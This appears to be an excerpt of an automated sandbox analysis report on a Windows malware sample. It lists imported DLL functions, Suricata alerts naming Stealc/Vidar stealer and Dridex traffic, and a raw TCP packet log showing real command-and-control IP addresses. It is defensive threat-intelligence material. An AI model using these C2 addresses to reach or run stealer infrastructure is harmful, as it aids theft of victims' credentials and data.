                                                                                                                                                                                                            KERNEL32.dllGetDateFormatW, GetStdHandle, ExitProcess, GetFileType, SetStdHandle, QueryPerformanceFrequency, HeapQueryInformation, GetTimeZoneInformation, VirtualQuery, GetSystemInfo, GetConsoleCP, GetCommandLineA, GetModuleHandleExW, FreeLibraryAndExitThread, ExitThread, CreateThread, SetConsoleCtrlHandler, InterlockedFlushSList, InterlockedPushEntrySList, RtlUnwind, OutputDebugStringW, GetTimeFormatW, CompareStringW, LCMapStringW, IsValidLocale, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetStringTypeW, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetEnvironmentStringsW, InitializeSListHead, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetStartupInfoW, IsDebuggerPresent, CreateEventW, WaitForSingleObjectEx, ResetEvent, IsProcessorFeaturePresent, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, LocalUnlock, EnumSystemLocalesW, LocalLock, SearchPathA, GetProfileIntA, GetTickCount, GetTempPathA, VerifyVersionInfoA, VerSetConditionMask, GetWindowsDirectoryA, FindResourceExW, lstrcpyA, SetErrorMode, SystemTimeToTzSpecificLocalTime, SetFileAttributesA, LocalFileTimeToFileTime, GetFileSizeEx, GetFileAttributesExA, FileTimeToLocalFileTime, GetCurrentDirectoryA, GetACP, GetCPInfo, GetOEMCP, VirtualProtect, GetUserDefaultUILanguage, GetSystemDefaultUILanguage, GetLocaleInfoW, GlobalFlags, FileTimeToSystemTime, GetAtomNameA, LocalReAlloc, LocalAlloc, GlobalHandle, GlobalReAlloc, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSection, GetStringTypeExA, GetThreadLocale, GetVolumeInformationA, MoveFileA, lstrcmpiA, GetShortPathNameA, LoadLibraryExA, DuplicateHandle, UnlockFile, SetEndOfFile, LockFile, GetFileSize, FlushFileBuffers, FindFirstFileA, FindClose, DeleteFileA, GetUserDefaultLCID, SystemTimeToFileTime, ReplaceFileA, GetTempFileNameA, SetFileTime, GetFullPathNameA, GetFileTime, GetFileAttributesA, GetCurrentProcessId, WritePrivateProfileStringA, GetPrivateProfileStringA, GetPrivateProfileIntA, lstrcmpA, GetVersionExA, GetCurrentThread, SuspendThread, SetThreadPriority, SetEvent, CompareStringA, GlobalGetAtomNameA, GlobalFindAtomA, GlobalAddAtomA, FindResourceA, lstrcmpW, GlobalDeleteAtom, LoadLibraryW, LoadLibraryExW, GetModuleHandleW, GetModuleFileNameW, FreeResource, GetSystemDirectoryW, GetCurrentThreadId, EncodePointer, OutputDebugStringA, CopyFileA, MulDiv, LocalFree, GlobalFree, GlobalUnlock, GlobalLock, GlobalSize, GlobalAlloc, GetModuleHandleA, GetModuleFileNameA, MultiByteToWideChar, ResumeThread, LeaveCriticalSection, EnterCriticalSection, GetLogicalDrives, GetDiskFreeSpaceA, VirtualFree, VirtualAlloc, CreateEventA, GetOverlappedResult, WriteFile, SetFilePointer, ReadFile, CreateFileA, WideCharToMultiByte, FindResourceW, SizeofResource, LockResource, LoadResource, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetProcessHeap, HeapSize, HeapFree, HeapReAlloc, HeapAlloc, HeapDestroy, RaiseException, DecodePointer, FormatMessageA, LoadLibraryA, GetProcAddress, FreeLibrary, GetCurrentProcess, Sleep, WaitForSingleObject, SetLastError, CloseHandle, WriteConsoleW, QueryDosDeviceA, GetLastError, FreeEnvironmentStringsW, SetEnvironmentVariableW, CreateFileW, GetCommandLineW
                                                                                                                                                                                                            USER32.dllGetMenuBarInfo, LoadImageA, DestroyIcon, InsertMenuItemA, CreatePopupMenu, LoadMenuA, TranslateAcceleratorA, LoadAcceleratorsA, BringWindowToTop, WindowFromPoint, WaitMessage, LoadCursorW, IsRectEmpty, SetWindowRgn, DrawIcon, KillTimer, SetTimer, ReleaseCapture, SetCapture, OffsetRect, SystemParametersInfoA, InflateRect, GetMenuItemInfoA, DestroyMenu, CharUpperA, SetRectEmpty, ClientToScreen, GetWindowDC, TabbedTextOutA, GrayStringA, DrawTextExA, DrawTextA, GetWindowThreadProcessId, ShowOwnedPopups, GetCursorPos, GetMessageA, GetDesktopWindow, GetActiveWindow, GetNextDlgTabItem, EndDialog, CreateDialogIndirectParamA, IsDialogMessageA, SetWindowTextA, ScrollWindowEx, IsWindowEnabled, SendDlgItemMessageA, IsDlgButtonChecked, CheckRadioButton, CheckDlgButton, GetDlgItemTextA, SetDlgItemTextA, GetDlgItemInt, SetDlgItemInt, MoveWindow, ShowWindow, GetMonitorInfoA, MonitorFromWindow, WinHelpA, GetScrollInfo, SetScrollInfo, LoadIconW, LoadIconA, CallNextHookEx, UnhookWindowsHookEx, SetWindowsHookExA, GetWindow, GetLastActivePopup, GetTopWindow, UnpackDDElParam, GetClassLongA, GetWindowLongA, PtInRect, EqualRect, CopyRect, GetSysColor, MapWindowPoints, ScreenToClient, MessageBoxA, AdjustWindowRectEx, GetClientRect, GetWindowTextLengthA, GetWindowTextA, RemovePropA, SetLayeredWindowAttributes, SetPropA, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, EndPaint, BeginPaint, SetForegroundWindow, GetForegroundWindow, SetActiveWindow, TrackPopupMenuEx, TrackPopupMenu, SetMenu, GetMenu, GetCapture, GetKeyState, SetFocus, GetDlgCtrlID, GetDlgItem, IsIconic, IsWindowVisible, EnumDisplayMonitors, SetClassLongA, OpenClipboard, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, UnregisterClassA, EnableWindow, TranslateMessage, DispatchMessageA, PeekMessageA, SetWindowPlacement, GetWindowPlacement, SetWindowPos, DestroyWindow, IsChild, IsMenu, IsWindow, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, CallWindowProcA, DefWindowProcA, GetMessageTime, GetMessagePos, RegisterWindowMessageA, ReuseDDElParam, GetSysColorBrush, RealChildWindowFromPoint, CopyImage, GetAsyncKeyState, MapDialogRect, GetDialogBaseUnits, DeleteMenu, LoadAcceleratorsW, LoadMenuW, LoadImageW, GetKeyNameTextA, MapVirtualKeyA, UnionRect, LoadBitmapW, SetMenuItemInfoA, SetParent, GetMenuDefaultItem, GetNextDlgGroupItem, DrawFocusRect, DrawIconEx, GetIconInfo, MessageBeep, EnableScrollBar, HideCaret, InvertRect, GetClassNameA, SendMessageA, PostMessageA, GetSystemMetrics, DrawMenuBar, GetSystemMenu, EnableMenuItem, UpdateWindow, GetDC, ReleaseDC, InvalidateRect, GetWindowRect, FillRect, IntersectRect, GetParent, TrackMouseEvent, SetCursor, SetWindowLongA, LoadCursorA, DestroyCursor, CopyIcon, PostQuitMessage, GetMenuStringA, GetMenuState, GetSubMenu, GetMenuItemID, GetMenuItemCount, InsertMenuA, AppendMenuA, RemoveMenu, GetFocus, CheckMenuItem, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, CloseClipboard, SetClipboardData, EmptyClipboard, DrawStateA, NotifyWinEvent, GetTabbedTextExtentW, GetTabbedTextExtentA, GetWindowRgn, WindowFromDC, CreateMenu, InSendMessage, MonitorFromRect, SendNotifyMessageA, SubtractRect, TranslateMDISysAccel, DefMDIChildProcA, DefFrameProcA, EnumChildWindows, GetUpdateRect, IsClipboardFormatAvailable, CharUpperBuffA, RegisterClipboardFormatA, ModifyMenuA, GetDoubleClickTime, SetMenuDefaultItem, CopyAcceleratorTableA, DestroyAcceleratorTable, CreateAcceleratorTableA, ToAsciiEx, GetKeyboardState, MapVirtualKeyExA, IsCharLowerA, GetKeyboardLayout, PostThreadMessageA, GetComboBoxInfo, MonitorFromPoint, UpdateLayeredWindow, LockWindowUpdate, GetDCEx, SetRect, FrameRect, SetCursorPos, IsZoomed, DrawFrameControl, GetPropA, DrawEdge
                                                                                                                                                                                                            GDI32.dllGetClipBox, GetClipRgn, GetCurrentPositionEx, GetObjectType, GetPixel, GetStockObject, GetViewportExtEx, GetWindowExtEx, IntersectClipRect, LineTo, OffsetClipRgn, PlayMetaFile, PtVisible, RectVisible, RestoreDC, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectPalette, SetBkMode, SetMapperFlags, SetGraphicsMode, SetMapMode, SetLayout, GetLayout, SetPolyFillMode, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextAlign, SetTextJustification, PlayMetaFileRecord, EnumMetaFile, SetWorldTransform, ModifyWorldTransform, SetColorAdjustment, StartDocA, ArcTo, PolyDraw, SelectClipPath, SetArcDirection, ExtCreatePen, MoveToEx, TextOutA, ExtTextOutA, PolyBezierTo, PolylineTo, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateFontIndirectA, GetTextExtentPoint32A, CreateEllipticRgn, Ellipse, ExcludeClipRect, DPtoLP, LPtoDP, GetTextMetricsA, CombineRgn, CreateRectRgnIndirect, GetMapMode, PatBlt, SetRectRgn, CreateFontA, GetCharWidthA, StretchDIBits, EnumFontFamiliesExA, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetSystemPaletteEntries, RealizePalette, GetBkColor, CreateDIBitmap, EnumFontFamiliesA, GetTextCharsetInfo, GetDIBits, SetPixel, StretchBlt, SetDIBColorTable, GetTextColor, CreatePolygonRgn, Polygon, Polyline, CreateRoundRectRgn, GetRgnBox, OffsetRgn, GetCurrentObject, RoundRect, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, ExtFloodFill, SetPaletteEntries, SetPixelV, GetWindowOrgEx, GetViewportOrgEx, CloseMetaFile, CreateMetaFileA, DeleteMetaFile, EndDoc, StartPage, EndPage, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, GetTextExtentPointA, GetTextExtentPoint32W, GetTextFaceA, Escape, CreateRectRgn, CreateSolidBrush, CreatePatternBrush, CreateHatchBrush, CreateDIBPatternBrushPt, SetTextColor, SetBkColor, CreateBitmap, GetDeviceCaps, CopyMetaFileA, GetObjectA, SelectObject, Rectangle, DeleteDC, CreatePen, CreateDCA, CreateCompatibleDC, CreateCompatibleBitmap, CreateDIBSection, DeleteObject, BitBlt
                                                                                                                                                                                                            MSIMG32.dllAlphaBlend, TransparentBlt
                                                                                                                                                                                                            COMDLG32.dllGetSaveFileNameA, CommDlgExtendedError
                                                                                                                                                                                                            WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter, GetJobA
                                                                                                                                                                                                            ADVAPI32.dllRegEnumKeyA, RegSetValueA, RegEnumKeyExA, RegEnumValueA, RegOpenKeyExW, GetFileSecurityA, SetFileSecurityA, RegQueryValueA, RegCloseKey, RegSetValueExA, RegDeleteValueA, RegDeleteKeyA, RegCreateKeyExA, RegQueryValueExA, RegOpenKeyExA
                                                                                                                                                                                                            SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, ShellExecuteA, DragQueryFileA, DragFinish, SHAddToRecentDocs, ExtractIconA, SHGetSpecialFolderLocation, SHGetDesktopFolder, SHGetMalloc, SHAppBarMessage, ShellExecuteExA, SHGetFileInfoA
                                                                                                                                                                                                            COMCTL32.dllInitCommonControlsEx
                                                                                                                                                                                                            SHLWAPI.dllPathFindExtensionA, PathFindExtensionW, PathIsUNCServerShareA, PathFindFileNameA, PathFileExistsA, PathIsUNCA, PathStripToRootA, StrFormatKBSizeA, PathRemoveFileSpecW, PathRemoveExtensionA
                                                                                                                                                                                                            UxTheme.dllOpenThemeData, DrawThemeParentBackground, CloseThemeData, IsThemeBackgroundPartiallyTransparent, GetThemeSysColor, GetWindowTheme, IsAppThemed, GetThemePartSize, GetCurrentThemeName, DrawThemeText, DrawThemeBackground, GetThemeColor
                                                                                                                                                                                                            ole32.dllOleIsCurrentClipboard, DoDragDrop, OleGetClipboard, CoLockObjectExternal, RegisterDragDrop, RevokeDragDrop, OleSetMenuDescriptor, OleLockRunning, StgCreateDocfile, StgOpenStorage, StgOpenStorageOnILockBytes, StgIsStorageFile, CreateILockBytesOnHGlobal, CreateFileMoniker, OleCreateMenuDescriptor, OleDestroyMenuDescriptor, OleTranslateAccelerator, IsAccelerator, OleRegGetMiscStatus, OleRegEnumVerbs, StgCreateDocfileOnILockBytes, WriteClassStm, GetHGlobalFromILockBytes, CreateGenericComposite, CreateItemMoniker, OleCreate, OleCreateFromData, OleCreateLinkFromData, OleFlushClipboard, OleSetClipboard, CreateStreamOnHGlobal, CLSIDFromString, CoDisconnectObject, StringFromGUID2, PropVariantCopy, CoInitialize, CoCreateInstance, OleCreateStaticFromData, OleCreateLinkToFile, CoGetMalloc, OleQueryLinkFromData, CoCreateGuid, CoUninitialize, SetConvertStg, OleRegGetUserType, ReleaseStgMedium, OleDuplicateData, ReadFmtUserTypeStg, WriteFmtUserTypeStg, CreateBindCtx, CoTreatAsClass, WriteClassStg, ReadClassStg, CoTaskMemFree, CoTaskMemAlloc, StringFromCLSID, CoInitializeEx, OleCreateFromFile, OleLoad, OleSave, OleSaveToStream, OleSetContainedObject, OleGetIconOfClass, OleRun, CreateDataAdviseHolder, CreateOleAdviseHolder, GetRunningObjectTable, OleIsRunning, OleQueryCreateFromData, CLSIDFromProgID, CoRegisterMessageFilter, CoRevokeClassObject, CoRegisterClassObject, CoGetClassObject, OleUninitialize, OleInitialize, CoFreeUnusedLibraries
                                                                                                                                                                                                            OLEAUT32.dllRegisterTypeLib, SysStringLen, SysReAllocStringLen, SystemTimeToVariantTime, VariantTimeToSystemTime, SafeArrayAllocDescriptor, SafeArrayAllocData, SafeArrayCreate, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayDestroy, SafeArrayRedim, SafeArrayGetDim, SafeArrayGetElemsize, SafeArrayGetUBound, SysAllocStringLen, LoadRegTypeLib, SafeArrayUnlock, SafeArrayAccessData, SafeArrayUnaccessData, SafeArrayGetElement, SafeArrayPutElement, SafeArrayCopy, SafeArrayPtrOfIndex, VariantCopy, VarDateFromStr, VarCyFromStr, VarBstrFromCy, VarBstrFromDate, VarBstrFromDec, VarDecFromStr, SysAllocString, SysAllocStringByteLen, LoadTypeLib, VariantChangeType, VariantClear, SafeArrayLock, VariantInit, SafeArrayGetLBound, SysFreeString, SysStringByteLen
                                                                                                                                                                                                            gdiplus.dllGdipDrawImageRectI, GdipSetInterpolationMode, GdipCreateFromHDC, GdipDrawImageI, GdipDeleteGraphics, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromFileICM, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromFile, GdipCreateBitmapFromStream, GdipGetImagePaletteSize, GdipGetImagePalette, GdipGetImagePixelFormat, GdipGetImageHeight, GdipGetImageWidth, GdipGetImageGraphicsContext, GdipGetImageEncoders, GdipGetImageEncodersSize, GdipCreateBitmapFromHBITMAP, GdipCreateBitmapFromScan0, GdipSaveImageToFile, GdipDisposeImage, GdipCloneImage, GdiplusShutdown, GdiplusStartup, GdipFree, GdipAlloc
                                                                                                                                                                                                            OLEACC.dllAccessibleObjectFromWindow, LresultFromObject, CreateStdAccessibleObject
                                                                                                                                                                                                            IMM32.dllImmReleaseContext, ImmGetOpenStatus, ImmGetContext
                                                                                                                                                                                                            WINMM.dllPlaySoundA
                                                                                                                                                                                                            oledlg.dll

                                                                                                                                                                                                            Possible Origin

                                                                                                                                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                            EnglishUnited States

                                                                                                                                                                                                            Network Behavior

                                                                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                            2024-10-23T07:03:10.116209+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64998995.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:11.614777+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64999095.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:13.666136+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64999195.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:15.274549+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64999295.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:15.971660+02002044247ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config195.217.220.103443192.168.2.649992TCP
                                                                                                                                                                                                            2024-10-23T07:03:16.883942+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64999395.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:17.565183+02002049087ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST1192.168.2.64999395.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:17.565702+02002051831ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1195.217.220.103443192.168.2.649993TCP
                                                                                                                                                                                                            2024-10-23T07:03:18.571787+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64999495.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:19.790589+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64999595.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:26.679279+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.64999795.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:40.979719+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000095.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:43.236395+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000195.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:45.076079+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000295.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:47.374464+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000395.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:49.523853+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000495.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:51.569193+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000595.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:53.515354+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000695.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:55.459525+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000795.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:58.412343+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000895.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:03:59.700362+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65000995.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:04:01.246503+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65001095.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:04:02.819275+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65001195.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:04:04.926276+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65001295.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:04:07.550843+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65001395.217.220.103443TCP
                                                                                                                                                                                                            2024-10-23T07:04:09.179772+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.65001495.217.220.103443TCP

                                                                                                                                                                                                            Network Port Distribution

                                                                                                                                                                                                            TCP Packets

                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                            Oct 23, 2024 07:02:57.516603947 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:57.516630888 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:57.517107964 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:57.599251986 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:57.599266052 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.425307989 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.425393105 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.502569914 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.502589941 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.502921104 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.503030062 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.507416010 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.551368952 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.752521038 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.752551079 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.752607107 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.752639055 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.752693892 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.752726078 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.756537914 CEST49940443192.168.2.6149.154.167.99
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.756551027 CEST44349940149.154.167.99192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.788196087 CEST4995180192.168.2.6107.191.36.218
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.793638945 CEST8049951107.191.36.218192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.794480085 CEST4995180192.168.2.6107.191.36.218
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.794605017 CEST4995180192.168.2.6107.191.36.218
                                                                                                                                                                                                            Oct 23, 2024 07:02:58.799861908 CEST8049951107.191.36.218192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.292043924 CEST8049951107.191.36.218192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.292118073 CEST4995180192.168.2.6107.191.36.218
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.292625904 CEST4995180192.168.2.6107.191.36.218
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.299127102 CEST8049951107.191.36.218192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.305226088 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.305248976 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.305406094 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.305700064 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:07.305713892 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.182658911 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.182749987 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.224523067 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.224555016 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.224927902 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.224986076 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.225557089 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.271323919 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.815499067 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.815525055 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.815538883 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.815579891 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.815598965 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.815677881 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.815677881 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.818907022 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.818947077 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.818978071 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.818984985 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.819020987 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935468912 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935523033 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935568094 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935600996 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935620070 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935641050 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.935678005 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.936047077 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.936055899 CEST4434998823.192.247.89192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.936065912 CEST49988443192.168.2.623.192.247.89
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.962914944 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.962987900 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.963069916 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.963918924 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:08.963978052 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.116050959 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.116209030 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.124449015 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.124500990 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.124887943 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.124948025 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.125286102 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.167356968 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.717686892 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.717880011 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.717924118 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.717952967 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.720959902 CEST49989443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.721000910 CEST4434998995.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748274088 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748308897 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748384953 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748598099 CEST49990443192.168.2.695.217.220.103
                                                                                                                                                                                                            Oct 23, 2024 07:03:10.748601913 CEST4434999095.217.220.103192.168.2.6
                                                                                                                                                                                                            Oct 23, 2024 07:03:11.614679098 CEST4434999095.217.220.103192.168.2.6
